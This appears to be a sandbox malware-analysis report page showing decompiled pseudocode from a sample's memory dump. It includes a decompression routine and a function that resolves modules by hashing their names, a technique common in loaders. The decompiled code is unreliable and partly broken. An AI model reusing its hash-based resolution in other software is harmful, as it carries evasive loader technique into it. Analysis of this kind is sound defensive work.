																					E006F6610(_t313, 0, _t20);
																					_t338 =  &(_t338[3]);
																					_t331 = _t330 - (_t330 << 8);
																					__eflags = _t331;
																					 *_t338 =  *_t338 + _t331 - 0xff;
																					_t198 = _t313 + _t330;
																					_t313 = _t338[1] + _t330 + 2;
																					_t252 = _t198;
																					_t187 =  *_t338;
																				}
																				 *_t313 = _t187;
																				_t306 = _t338[0xe];
																				_t257 = _t252 + 2;
																				__eflags = _t257;
																				goto L9;
																			} else {
																				 *_t252 = _t181 + 0x000000fe | 0x00000020;
																				_t257 = _t252 + 1;
																				L9:
																				_t281 = _t338[2];
																				goto L63;
																			}
																			goto L64;
																		}
																		L63:
																		_t282 = _t281 >> 6;
																		_t170 = _t281 << 2;
																		__eflags = _t170;
																		 *_t257 = _t170;
																	}
																}
															}
														}
													}
												}
												goto L64;
											}
										}
									}
								} else {
									_t311 = _t338[0x10];
									goto L23;
								}
							} else {
								_t311 = _t227;
								goto L23;
							}
							L67:
							_t266 = _t276 - _t305;
							 *_t326 = _t231 - _t306;
							_t144 = _t326;
							_t319 = _t338[0xd];
							goto L68;
							L23:
							_t54 = _t303 + 1; // -3
							_t227 = _t311;
							_t342 = _t303 + 0xfffffffd - _t338[6];
							_t303 = _t54;
							 *(_t311 + _t324 * 4) =  *_t338;
						} while (_t342 < 0);
						_t305 = _t338[3];
						_t326 = _t338[0xf];
						_t306 = _t338[0xe];
						_t276 = _t338[5];
						_t231 = _t338[1];
						_t224 = _t338[0xc];
						goto L67;
						L64:
						 *(_t257 + 1) = _t282;
						_t237 = _t257 + 2;
						__eflags = _t302 - _t338[6];
						_t326 = _t338[0xf];
						_t276 = _t338[5];
						_t338[3] = _t302;
					} while (_t302 < _t338[6]);
					goto L67;
				}
				L68:
				if(_t266 != 0) {
					_t301 = _t266;
					if(_t231 != _t306 || _t266 > 0xee) {
						__eflags = _t266 - 3;
						if(_t266 > 3) {
							__eflags = _t266 - 0x12;
							if(_t266 > 0x12) {
								_t225 = _t266 - 0x12;
								 *_t231 = 0;
								__eflags = _t225 - 0x100;
								if(_t225 >= 0x100) {
									_t338[1] = _t231;
									__eflags = 0x80808081;
									E006F6610(_t338[1] + 1, 0, ((_t266 - 0x112) * 0x80808081 >> 0x20 >> 7) + 1);
									_t236 = _t338[4];
									_t338 =  &(_t338[3]);
									do {
										_t225 = _t225 + 0xffffff01;
										_t236 = _t236 + 1;
										__eflags = _t225 - 0xff;
									} while (_t225 > 0xff);
									_t266 = _t301;
								}
								 *(_t231 + 1) = _t225;
								_t224 = _t338[0xc];
								_t231 = _t231 + 2;
								__eflags = _t231;
							} else {
								 *_t231 = _t266 + 0xfd;
								_t231 = _t231 + 1;
							}
						} else {
							 *(_t231 - 2) =  *(_t231 - 2) | _t266;
						}
					} else {
						_t231 = _t306 + 1;
						 *_t306 = _t266 + 0x11;
					}
					_t226 = _t224 + _t319;
					_t320 = _t231;
					_t147 =  ~_t266;
					do {
						 *_t231 =  *((intOrPtr*)(_t226 + _t147));
						_t231 = _t231 + 1;
						_t147 = _t147 + 1;
					} while (_t147 != 0);
					_t144 = _t338[0xf];
					_t231 = _t320 + _t301;
				}
				 *_t231 = 0x11;
				 *(_t231 + 2) = 0;
				 *_t144 = _t231 + 3 - _t306;
				return 0;
			}

0x006f35e7
0x006f35eb
0x006f35ef
0x006f35f3
0x006f35fa
0x006f35fc
0x006f35fe
0x006f360b
0x006f360e
0x006f3610
0x006f3614
0x006f3618
0x006f36d7
0x006f36d7
0x006f36db
0x006f36de
0x006f36e2
0x006f36e2
0x006f36e6
0x006f36f2
0x006f36f2
0x006f36f5
0x006f36f8
0x006f36ff
0x006f371a
0x006f371f
0x006f3725
0x006f372a
0x006f3730
0x006f3732
0x006f3735
0x006f373b
0x006f3743
0x006f3749
0x006f374b
0x006f3753
0x006f3757
0x006f375b
0x006f375e
0x006f377c
0x006f3782
0x006f3785
0x006f3789
0x00000000
0x006f378b
0x006f378e
0x006f3790
0x006f3793
0x006f3799
0x006f37ba
0x006f37c0
0x00000000
0x006f37c2
0x006f37c2
0x006f37c5
0x00000000
0x006f37c7
0x00000000
0x006f37c7
0x006f37c5
0x00000000
0x00000000
0x00000000
0x006f3799
0x00000000
0x00000000
0x00000000
0x006f374d
0x006f374d
0x006f3760
0x006f3763
0x006f3767
0x00000000
0x006f3769
0x006f376d
0x006f3770
0x00000000
0x006f3772
0x006f37c9
0x006f37cd
0x006f37d0
0x006f37d4
0x006f37da
0x006f37dd
0x006f37df
0x006f37e1
0x006f37fa
0x006f37fd
0x006f3801
0x006f37e3
0x006f37e3
0x006f37e7
0x006f37eb
0x006f37ee
0x006f37f0
0x006f380a
0x006f380d
0x006f3818
0x006f381b
0x006f381e
0x006f3821
0x006f3827
0x006f3846
0x006f384b
0x006f3883
0x006f3883
0x006f3885
0x006f3887
0x006f3889
0x006f3889
0x006f388b
0x006f388b
0x006f388e
0x006f380f
0x006f3813
0x006f3815
0x006f3815
0x006f37f2
0x006f37f2
0x006f37f2
0x006f3891
0x006f3895
0x006f3895
0x006f3897
0x006f3899
0x006f3899
0x006f389e
0x006f38a1
0x006f38a2
0x006f38a4
0x006f38a4
0x006f38a8
0x006f38a8
0x006f38a8
0x006f38aa
0x006f38b1
0x006f38b4
0x006f3942
0x006f3942
0x006f3943
0x006f3947
0x006f394d
0x006f3950
0x006f3956
0x006f3974
0x006f397a
0x006f3986
0x006f398c
0x006f39a1
0x006f39a1
0x006f39a2
0x006f397c
0x006f397e
0x006f397f
0x006f397f
0x00000000
0x006f397f
0x00000000
0x006f3958
0x006f3958
0x006f3959
0x006f3960
0x006f396d
0x006f396f
0x006f396f
0x006f38ba
0x006f38bd
0x006f38bf
0x006f3932
0x00000000
0x006f38c1
0x006f38c4
0x006f38c7
0x006f3935
0x00000000
0x006f38c9
0x006f38cc
0x006f38cf
0x006f393a
0x00000000
0x006f38d1
0x006f38d4
0x006f38d7
0x006f393f
0x006f393f
0x00000000
0x006f38d9
0x006f38dc
0x006f38df
0x006f38e2
0x00000000
0x006f38e4
0x006f38e4
0x006f38e8
0x006f38ea
0x006f38f0
0x006f38f0
0x006f38f3
0x006f38f5
0x006f38f7
0x00000000
0x00000000
0x006f38f9
0x006f38fa
0x006f38fb
0x006f38fd
0x00000000
0x00000000
0x00000000
0x006f38fd
0x006f38f3
0x006f38ff
0x006f3901
0x006f3905
0x006f3908
0x006f390e
0x006f3621
0x006f3625
0x006f362b
0x006f362e
0x006f3652
0x006f365d
0x006f3661
0x006f3661
0x00000000
0x006f3630
0x006f363f
0x006f3981
0x006f3981
0x006f3983
0x006f3983
0x006f3914
0x006f3914
0x006f3919
0x006f391c
0x006f3920
0x006f3649
0x006f364b
0x006f3663
0x006f3663
0x006f3665
0x006f3668
0x006f366e
0x006f3670
0x006f3672
0x006f3687
0x006f368a
0x006f3692
0x006f3696
0x006f369b
0x006f36ad
0x006f36ad
0x006f36b9
0x006f36bc
0x006f36be
0x006f36c0
0x006f36c2
0x006f36c2
0x006f36c5
0x006f36c7
0x006f36cb
0x006f36cb
0x00000000
0x006f3926
0x006f392a
0x006f392c
0x006f36ce
0x006f36ce
0x00000000
0x006f36ce
0x00000000
0x006f3920
0x006f39a5
0x006f39a7
0x006f39aa
0x006f39aa
0x006f39ad
0x006f39ad
0x006f38e2
0x006f38d7
0x006f38cf
0x006f38c7
0x006f38bf
0x00000000
0x006f38b4
0x006f3770
0x006f3767
0x006f373d
0x006f373d
0x00000000
0x006f373d
0x006f372c
0x006f372c
0x00000000
0x006f372c
0x006f39e5
0x006f39e7
0x006f39eb
0x006f39ee
0x006f39f0
0x00000000
0x006f379b
0x006f379b
0x006f37a4
0x006f37a6
0x006f37aa
0x006f37ac
0x006f37ac
0x006f39cd
0x006f39d1
0x006f39d5
0x006f39d9
0x006f39dd
0x006f39e1
0x00000000
0x006f39af
0x006f39af
0x006f39b2
0x006f39b5
0x006f39b9
0x006f39bd
0x006f39c1
0x006f39c1
0x00000000
0x006f39cb
0x006f39f4
0x006f39f6
0x006f39fe
0x006f3a00
0x006f3a15
0x006f3a18
0x006f3a1f
0x006f3a22
0x006f3a2d
0x006f3a30
0x006f3a33
0x006f3a39
0x006f3a3b
0x006f3a56
0x006f3a5b
0x006f3a60
0x006f3a64
0x006f3a67
0x006f3a67
0x006f3a6d
0x006f3a6e
0x006f3a6e
0x006f3a76
0x006f3a76
0x006f3a78
0x006f3a7b
0x006f3a7f
0x006f3a7f
0x006f3a24
0x006f3a28
0x006f3a2a
0x006f3a2a
0x006f3a1a
0x006f3a1a
0x006f3a1a
0x006f3a0a
0x006f3a0c
0x006f3a11
0x006f3a11
0x006f3a84
0x006f3a86
0x006f3a88
0x006f3a8a
0x006f3a8d
0x006f3a8f
0x006f3a90
0x006f3a90
0x006f3a93
0x006f3a99
0x006f3a99
0x006f3a9b
0x006f3aa0
0x006f3aa9
0x006f3ab4

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2dacaa7aeba0b4f596d5ac52d30f7cae44ded1dbb400a95ac22fa8a18c5141
Instruction ID: 0e51e845a0b3721e604a526cbf4740086732b9495102e126bcc0f6538324a585
Opcode Fuzzy Hash: 1e2dacaa7aeba0b4f596d5ac52d30f7cae44ded1dbb400a95ac22fa8a18c5141
Instruction Fuzzy Hash: E1E1D17160C2998FC714DE28C48057AFBE3EF95300F18866DEAD58B346E375AE468B91

Uniqueness

Uniqueness Score: -1.00%

Function 006E2E60, Relevance: .3, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E006E2E60() {
				signed char _t81;
				intOrPtr* _t85;
				signed int _t91;
				signed int _t103;
				void* _t105;
				void* _t106;
				signed char _t107;
				signed char _t111;
				signed short* _t117;
				intOrPtr* _t121;
				signed int _t127;
				void* _t130;
				signed char _t131;
				void* _t133;
				signed int _t134;
				void* _t136;
				void* _t137;
				intOrPtr* _t138;
				signed int _t145;
				signed int _t146;
				void* _t151;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t156;
				void* _t158;
				void* _t160;
				void* _t167;
				signed int _t168;
				void* _t170;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t178;
				void* _t182;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				signed int _t188;
				signed short* _t189;
				signed short* _t190;
				signed short* _t191;
				signed short* _t192;
				void* _t193;
				void* _t195;
				signed int _t198;
				signed short* _t201;
				signed int _t202;
				signed int _t203;
				signed short* _t204;
				void* _t209;
				signed int* _t211;

				_t190 = _t211[8];
				_t134 = _t211[0xa];
				 *(_t211[0xb]) = 0;
				_t81 =  *_t190 & 0x000000ff;
				if(_t81 < 0x12) {
					_t204 = _t190;
					goto L8;
				} else {
					_t175 = _t81 - 0x11;
					_t204 =  &(_t190[0]);
					if(_t175 >= 4) {
						_t189 = _t190 + _t81 - 0x10;
						_t203 = _t211[0xa];
						_t133 = 0;
						do {
							 *((char*)(_t203 + _t133)) =  *((intOrPtr*)(_t204 + _t133));
							_t133 = _t133 + 1;
						} while (_t175 != _t133);
						_t172 = _t175 + _t203;
						_t201 = _t189;
						L27:
						_t146 =  *_t201 & 0x000000ff;
						if(_t146 <= 0xf) {
							_t192 =  &(_t201[1]);
							_t121 = _t172 - (_t146 >> 2) + 0xfffff7ff - ((_t201[0] & 0x000000ff) << 2);
							 *_t172 =  *_t121;
							 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t121 + 1));
							 *(_t172 + 2) =  *((intOrPtr*)(_t121 + 2));
							_t173 = _t172 + 3;
							L30:
							_t204 = _t192;
							L60:
							_t134 = _t173;
							_t175 =  *(_t204 - 2) & 3;
							if(_t175 == 0) {
								_t81 =  *_t204;
								L8:
								_t191 =  &(_t204[0]);
								_t146 = _t81 & 0x000000ff;
								if(_t81 > 0xf) {
									goto L31;
								} else {
									if(_t146 == 0) {
										_t131 =  *_t191;
										if(_t131 == 0) {
											_t170 = 0;
											do {
												_t131 = _t204[1];
												_t170 = _t170 + 0xff;
												_t204 =  &(_t204[0]);
											} while (_t131 == 0);
										}
										_t146 = 0 + (_t131 & 0x000000ff) + 0xf;
										_t191 =  &(_t204[1]);
									}
									_t172 = _t134 + 4;
									_t209 = _t146 - 1;
									 *_t134 =  *_t191;
									_t117 = _t191;
									_t201 =  &(_t191[2]);
									if(_t209 != 0) {
										 *_t211 = _t117;
										if(_t209 <= 3) {
											_t186 = 0;
											_t167 = _t146 + 3;
											 *_t211 =  *_t211 + _t146 + 3;
											do {
												 *((char*)(_t172 + _t186)) =  *((intOrPtr*)(_t201 + _t186));
												_t186 = _t186 + 1;
											} while (_t209 != _t186);
											_t201 =  *_t211;
											goto L25;
										} else {
											_t168 = _t146 + 0xfffffffb;
											_t187 = 4;
											_t127 = _t168 & 0xfffffffc;
											_t202 = _t127;
											_t211[2] = _t127 + 8;
											_t178 =  *_t211;
											_t211[1] = _t178 + _t127 + 8;
											do {
												_t209 = _t209 + 0xfffffffc;
												 *((intOrPtr*)(_t134 + _t187)) =  *((intOrPtr*)(_t178 + _t187));
												_t187 = _t187 + 4;
											} while (_t209 > 3);
											_t134 = _t134 + _t211[2];
											_t167 = _t168 - _t202;
											if(_t167 != 0) {
												_t188 = _t211[1];
												_t130 = 0;
												_t201 = _t188 + _t167;
												do {
													 *((char*)(_t134 + _t130)) =  *((intOrPtr*)(_t188 + _t130));
													_t130 = _t130 + 1;
												} while (_t167 != _t130);
												L25:
												_t145 = _t134 + _t167;
											} else {
												_t201 = _t211[1];
											}
										}
										_t172 = _t145;
									}
									goto L27;
								}
								goto L32;
							} else {
								goto L61;
							}
							L66:
						} else {
							_t191 =  &(_t201[0]);
						}
					} else {
						_t134 = _t211[0xa];
						L61:
						_t193 = _t175 - 1;
						_t151 = 0;
						do {
							 *((char*)(_t134 + _t151)) =  *((intOrPtr*)(_t204 + _t151));
							_t151 = _t151 + 1;
						} while (_t175 != _t151);
						_t146 =  *(_t204 + _t175) & 0x000000ff;
						_t134 = _t134 + _t175;
						_t191 = _t204 + _t193 + 2;
						L31:
						_t172 = _t134;
					}
				}
				L32:
				if(_t146 >= 0x40) {
					_t152 = (_t146 >> 5) - 1;
					_t204 =  &(_t191[0]);
					_t138 = _t172 - (_t146 >> 0x00000002 & 0x00000007) - 1 - (( *_t191 & 0x000000ff) << 3);
					L57:
					_t60 = _t152 + 2; // 0x2
					_t182 = _t60;
					_t195 = 0;
					 *_t172 =  *_t138;
					 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t138 + 1));
					do {
						 *((char*)(_t172 + _t195 + 2)) =  *((intOrPtr*)(_t138 + _t195 + 2));
						_t195 = _t195 + 1;
					} while (_t152 != _t195);
					_t173 = _t172 + _t182;
					goto L60;
				}
				if(_t146 >= 0x20) {
					_t152 = _t146 & 0x0000001f;
					if(_t152 == 0) {
						_t111 =  *_t191;
						if(_t111 == 0) {
							_t160 = 0;
							do {
								_t111 = _t191[0];
								_t160 = _t160 + 0xff;
								_t191 =  &(_t191[0]);
							} while (_t111 == 0);
						}
						_t191 =  &(_t191[0]);
						_t152 = 0 + (_t111 & 0x000000ff) + 0x1f;
					}
					_t204 =  &(_t191[1]);
					_t138 = _t172 - (( *_t191 & 0x0000ffff) >> 2) - 1;
					L49:
					if(_t152 < 6 || _t172 - _t138 < 4) {
						goto L57;
					} else {
						_t185 = _t152 - 2;
						_t155 = _t152 + 0xfffffffa;
						 *_t172 =  *_t138;
						_t103 = _t155 & 0xfffffffc;
						 *_t211 = _t103;
						_t211[1] = _t138 + _t103 + 8;
						_t105 = 4;
						_t211[2] = _t103 + 8;
						do {
							_t185 = _t185 + 0xfffffffc;
							 *((intOrPtr*)(_t172 + _t105)) =  *((intOrPtr*)(_t138 + _t105));
							_t105 = _t105 + 4;
						} while (_t185 > 3);
						_t173 = _t172 + _t211[2];
						_t156 = _t155 -  *_t211;
						if(_t156 != 0) {
							_t198 = _t211[1];
							_t106 = 0;
							do {
								 *((char*)(_t173 + _t106)) =  *((intOrPtr*)(_t198 + _t106));
								_t106 = _t106 + 1;
							} while (_t156 != _t106);
							_t173 = _t173 + _t156;
						}
					}
					goto L60;
				}
				if(_t146 < 0x10) {
					_t192 =  &(_t191[0]);
					_t85 = _t172 - (_t146 >> 2) - 1 - (( *_t191 & 0x000000ff) << 2);
					 *_t172 =  *_t85;
					 *((char*)(_t172 + 1)) =  *((intOrPtr*)(_t85 + 1));
					_t173 = _t172 + 2;
					goto L30;
				}
				_t136 = _t172 - ((_t146 & 0x00000008) << 0xb);
				_t152 = _t146 & 0x00000007;
				if(_t152 == 0) {
					_t107 =  *_t191;
					if(_t107 == 0) {
						_t158 = 0;
						do {
							_t107 = _t191[0];
							_t158 = _t158 + 0xff;
							_t191 =  &(_t191[0]);
						} while (_t107 == 0);
					}
					_t191 =  &(_t191[0]);
					_t152 = 0 + (_t107 & 0x000000ff) + 7;
				}
				_t91 = _t211[8];
				_t184 = _t211[9] + _t91;
				_t137 = _t136 - (( *_t191 & 0x0000ffff) >> 2);
				_t204 =  &(_t191[1]);
				if(_t137 != _t172) {
					_t138 = _t137 + 0xffffc000;
					goto L49;
				}
				_t154 = (_t91 & 0xffffff00 | _t204 - _t184 >= 0x00000000) << 0x00000002 & 0x000000ff | 0xfffffff8;
				_t95 =  !=  ? _t154 : 0;
				 *(_t211[0xb]) = _t172 - _t211[0xa];
				return  !=  ? _t154 : 0;
				goto L66;
			}

0x006e2e6b
0x006e2e6f
0x006e2e73
0x006e2e79
0x006e2e7f
0x006e2e95
0x00000000
0x006e2e81
0x006e2e81
0x006e2e84
0x006e2e8a
0x006e2e99
0x006e2e9d
0x006e2ea1
0x006e2ea3
0x006e2ea7
0x006e2eaa
0x006e2eab
0x006e2eaf
0x006e2eb1
0x006e2f81
0x006e2f81
0x006e2f87
0x006e2f97
0x006e2fa2
0x006e2fa6
0x006e2fab
0x006e2fb1
0x006e2fb4
0x006e2fb7
0x006e2fb7
0x006e3102
0x006e3102
0x006e3108
0x006e310d
0x006e2eb8
0x006e2ebb
0x006e2ebb
0x006e2ebe
0x006e2ec3
0x00000000
0x006e2ec9
0x006e2ecb
0x006e2ecd
0x006e2ed3
0x006e2ed5
0x006e2ed7
0x006e2ed7
0x006e2eda
0x006e2ee0
0x006e2ee1
0x006e2ed7
0x006e2eeb
0x006e2eef
0x006e2eef
0x006e2ef5
0x006e2ef8
0x006e2ef9
0x006e2efb
0x006e2efd
0x006e2f00
0x006e2f05
0x006e2f08
0x006e2f4d
0x006e2f53
0x006e2f56
0x006e2f59
0x006e2f5c
0x006e2f5f
0x006e2f60
0x006e2f64
0x00000000
0x006e2f0a
0x006e2f0a
0x006e2f0d
0x006e2f14
0x006e2f1a
0x006e2f1c
0x006e2f20
0x006e2f27
0x006e2f2b
0x006e2f2e
0x006e2f31
0x006e2f34
0x006e2f37
0x006e2f3c
0x006e2f40
0x006e2f42
0x006e2f69
0x006e2f6d
0x006e2f6f
0x006e2f72
0x006e2f75
0x006e2f78
0x006e2f79
0x006e2f7d
0x006e2f7d
0x006e2f44
0x006e2f44
0x006e2f44
0x006e2f42
0x006e2f7f
0x006e2f7f
0x00000000
0x006e2f00
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x006e2f89
0x006e2f89
0x006e2f89
0x006e2e8c
0x006e2e8c
0x006e3113
0x006e3113
0x006e3116
0x006e3118
0x006e311c
0x006e311f
0x006e3120
0x006e3124
0x006e3129
0x006e312b
0x006e2fbe
0x006e2fbe
0x006e2fbe
0x006e2e8a
0x006e2fc0
0x006e2fc3
0x006e2fd3
0x006e2fd4
0x006e2fdf
0x006e30e4
0x006e30e6
0x006e30e6
0x006e30e9
0x006e30eb
0x006e30f0
0x006e30f3
0x006e30f7
0x006e30fb
0x006e30fc
0x006e3100
0x00000000
0x006e3100
0x006e2fe9
0x006e2feb
0x006e2fee
0x006e2ff0
0x006e2ff6
0x006e2ff8
0x006e2ffa
0x006e2ffa
0x006e2ffd
0x006e3003
0x006e3004
0x006e2ffa
0x006e300b
0x006e300c
0x006e300c
0x006e3018
0x006e301f
0x006e3081
0x006e3084
0x00000000
0x006e308f
0x006e3091
0x006e3094
0x006e3097
0x006e309b
0x006e30a1
0x006e30a8
0x006e30ac
0x006e30b1
0x006e30b5
0x006e30b8
0x006e30bb
0x006e30be
0x006e30c1
0x006e30c6
0x006e30ca
0x006e30cd
0x006e30cf
0x006e30d3
0x006e30d5
0x006e30d8
0x006e30db
0x006e30dc
0x006e30e0
0x006e30e0
0x006e30cd
0x00000000
0x006e3084
0x006e3025
0x006e313e
0x006e3143
0x006e3147
0x006e314c
0x006e314f
0x00000000
0x006e314f
0x006e3035
0x006e3037
0x006e303a
0x006e303c
0x006e3042
0x006e3044
0x006e3046
0x006e3046
0x006e3049
0x006e304f
0x006e3050
0x006e3046
0x006e3057
0x006e3058
0x006e3058
0x006e305f
0x006e306a
0x006e306c
0x006e3070
0x006e3075
0x006e307b
0x00000000
0x006e307b
0x006e3168
0x006e316d
0x006e3174
0x006e317d
0x00000000

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea868b4f4202321aabfc81a34691dc5411bae3e380ba442f8620b2556fde1f9
Instruction ID: 4ffdd233cd60cc9cc51ffb2717cf17c191ab0e4ac8f52f4aa911621cdc82fb92
Opcode Fuzzy Hash: cea868b4f4202321aabfc81a34691dc5411bae3e380ba442f8620b2556fde1f9
Instruction Fuzzy Hash: 80A14B311093E24BCB298F3DC8A41B9FBE3AF5A314B1D46ADD9D6CB347D2249906C790

Uniqueness

Uniqueness Score: -1.00%

Function 006E36E0, Relevance: .2, Instructions: 179
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E006E36E0(intOrPtr _a4, intOrPtr _a8, char _a12) {
				char _v528;
				char _v638;
				char _v789;
				char _v1148;
				char _v1149;
				char _v1150;
				intOrPtr _t51;
				void* _t55;
				char* _t56;
				void* _t57;
				intOrPtr* _t58;
				unsigned int _t59;
				void* _t63;
				signed int _t65;
				void* _t68;
				void* _t69;
				char _t74;
				intOrPtr _t79;
				signed int _t80;
				char _t81;
				char* _t82;
				char _t83;
				char* _t87;
				char* _t91;
				void* _t94;
				short _t95;
				void* _t97;
				signed char _t99;
				intOrPtr* _t101;
				char _t102;
				unsigned int _t103;
				intOrPtr* _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t116;
				intOrPtr _t117;
				signed int _t119;
				void* _t120;
				char _t121;
				void* _t123;
				intOrPtr _t124;
				char* _t125;
				void* _t129;
				intOrPtr* _t130;
				char _t143;
				char _t159;

				_t51 = _a4;
				_t79 = _a8;
				_t101 = _a12;
				_t124 =  *((intOrPtr*)(_t51 + 0x3c));
				_t117 =  *((intOrPtr*)(_t51 + _t124 + 0x78));
				if(_t117 > _t79 || _t117 +  *((intOrPtr*)(_t51 + _t124 + 0x7c)) <= _t79) {
					 *_t101 = _t51 + _t79;
					goto L40;
				} else {
					_t55 = _t51 + _t79;
					_t80 = 0;
					do {
						_t102 =  *((intOrPtr*)(_t55 + _t80));
						 *((char*)(_t129 + _t80 + 0x16f)) = _t102;
						_t80 = _t80 + 1;
					} while (_t102 != 0);
					_t125 =  &_v789;
					do {
						_t56 = _t125;
						_t125 = _t125 + 1;
					} while ( *_t56 != 0x2e);
					 *_t56 = 0;
					_t57 = 0;
					do {
						_t81 =  *((intOrPtr*)(_t129 + _t57 + 0x16f));
						 *((char*)(_t129 + _t57 + 6)) = _t81;
						_t57 = _t57 + 1;
					} while (_t81 != 0);
					_t58 =  &_v1150;
					_t82 =  &_v638;
					while( *_t58 != 0) {
						_t58 = _t58 + 1;
						if(_t58 < _t82) {
							continue;
						}
						break;
					}
					 *_t58 = 0x6c6c642e;
					 *((intOrPtr*)(_t58 + 4)) = 0;
					_t83 = _v1150;
					if(_t83 == 0) {
						L25:
						_t59 = 0;
						L26:
						_t63 = E006E35D0(((_t59 >> 0x0000000b ^ _t59) << 0xf) + (_t59 >> 0x0000000b ^ _t59));
						_t130 = _t129 + 4;
						if(_t63 != 0) {
							L31:
							_t119 =  *_t125;
							_t87 =  &_v1148;
							_t103 = 0;
							 *((short*)(_t87 - 2)) = 1;
							 *_t130 = _t87;
							if(_t119 == 0) {
								L39:
								_t91 =  &_v1150;
								 *((intOrPtr*)(_t91 + 2)) = ((_t103 >> 0x0000000b ^ _t103) << 0xf) + (_t103 >> 0x0000000b ^ _t103);
								_t107 = _t130;
								 *((short*)(_t91 + 6)) = 0;
								 *((intOrPtr*)(_t91 + 8)) = 0;
								 *_t107 = _t91;
								_push( &_a12);
								_push(_t107);
								_push(_t63);
								E006E5F90();
								L40:
								return 1;
							}
							_t94 = 0xffffffffffffffff;
							do {
								_t159 =  *((char*)(_t125 + _t94 + 2));
								_t94 = _t94 + 1;
							} while (_t159 != 0);
							if(_t94 + 1 <= 0) {
								goto L39;
							}
							_t110 = (_t119 << 0x0000000a) + _t119 >> 0x00000006 ^ (_t119 << 0x0000000a) + _t119;
							if(_t94 == 0) {
								L38:
								_t103 = _t110 + _t110 * 8;
								goto L39;
							}
							_t120 = 0;
							do {
								_t74 =  *((char*)(_t125 + _t120 + 1));
								_t120 = _t120 + 1;
								_t110 = (_t74 + _t110 << 0x0000000a) + _t74 + _t110 >> 0x00000006 ^ (_t74 + _t110 << 0x0000000a) + _t74 + _t110;
							} while (_t94 != _t120);
							goto L38;
						}
						_t65 = 0;
						while(1) {
							_t95 =  *((char*)(_t130 + _t65 + 6));
							 *((short*)(_t130 + 0x274 + _t65 * 2)) = _t95;
							if(_t95 == 0) {
								break;
							}
							_t65 = _t65 + 1;
							if(_t65 < 0x200) {
								continue;
							}
							break;
						}
						_t63 = E006EC6D0( &_v528);
						_t130 = _t130 + 4;
						if(_t63 == 0) {
							return 0;
						}
						goto L31;
					}
					_t68 = 0;
					do {
						_t143 =  *((char*)(_t129 + _t68 + 7));
						_t68 = _t68 + 1;
					} while (_t143 != 0);
					if(_t68 <= 0) {
						goto L25;
					}
					if(_t83 == 0) {
						L21:
						_t69 = _t68 - 1;
						_t113 = 0;
						_t97 = 0xffffffffffffffff;
						do {
							_t121 =  *((char*)(_t129 + _t97 + 7));
							_t97 = _t97 + 1;
							_t113 = (_t121 + _t113 << 0x0000000a) + _t121 + _t113 >> 0x00000006 ^ (_t121 + _t113 << 0x0000000a) + _t121 + _t113;
						} while (_t69 != _t97);
						_t59 = _t113 + _t113 * 8;
						goto L26;
					}
					_t116 =  &_v1149;
					_t123 = _t68;
					while(1) {
						_t99 = _t83 + 0xbf;
						if(_t99 <= 0x19) {
							 *(_t116 - 1) = _t99 | 0x00000020;
						}
						if(_t123 < 2) {
							goto L21;
						}
						_t83 =  *_t116;
						_t123 = _t123 - 1;
						_t116 = _t116 + 1;
						if(_t83 != 0) {
							continue;
						}
						goto L21;
					}
					goto L21;
				}
			}

0x006e36ea
0x006e36f1
0x006e36f8
0x006e36ff
0x006e3702
0x006e3708
0x006e37d9
0x00000000
0x006e371a
0x006e371a
0x006e371c
0x006e371e
0x006e371e
0x006e3721
0x006e3728
0x006e3729
0x006e372d
0x006e3734
0x006e3734
0x006e3736
0x006e3737
0x006e373c
0x006e373f
0x006e3741
0x006e3741
0x006e3748
0x006e374c
0x006e374d
0x006e3751
0x006e3755
0x006e375c
0x006e3761
0x006e3764
0x00000000
0x00000000
0x00000000
0x006e3764
0x006e3766
0x006e376c
0x006e3773
0x006e3779
0x006e37e0
0x006e37e0
0x006e37e2
0x006e37f1
0x006e37f6
0x006e37fb
0x006e3831
0x006e3831
0x006e3834
0x006e3838
0x006e383a
0x006e3840
0x006e3845
0x006e388c
0x006e389a
0x006e389e
0x006e38a1
0x006e38a3
0x006e38a9
0x006e38b0
0x006e38b9
0x006e38ba
0x006e38bb
0x006e38bc
0x006e38c4
0x00000000
0x006e38c6
0x006e3849
0x006e384a
0x006e384a
0x006e384f
0x006e384f
0x006e3859
0x00000000
0x00000000
0x006e3867
0x006e386b
0x006e3889
0x006e3889
0x00000000
0x006e3889
0x006e386d
0x006e386f
0x006e386f
0x006e3874
0x006e3883
0x006e3885
0x00000000
0x006e386f
0x006e37fd
0x006e37ff
0x006e37ff
0x006e3807
0x006e380f
0x00000000
0x00000000
0x006e3811
0x006e3817
0x00000000
0x00000000
0x00000000
0x006e3817
0x006e3821
0x006e3826
0x006e382b
0x00000000
0x006e38d2
0x00000000
0x006e382b
0x006e377b
0x006e377d
0x006e377d
0x006e3782
0x006e3782
0x006e3789
0x00000000
0x00000000
0x006e378d
0x006e37b2
0x006e37b2
0x006e37b3
0x006e37b7
0x006e37b8
0x006e37b8
0x006e37bd
0x006e37cc
0x006e37ce
0x006e37d2
0x00000000
0x006e37d2
0x006e378f
0x006e3793
0x006e3795
0x006e3797
0x006e379d
0x006e37a2
0x006e37a2
0x006e37a8
0x00000000
0x00000000
0x006e37aa
0x006e37ac
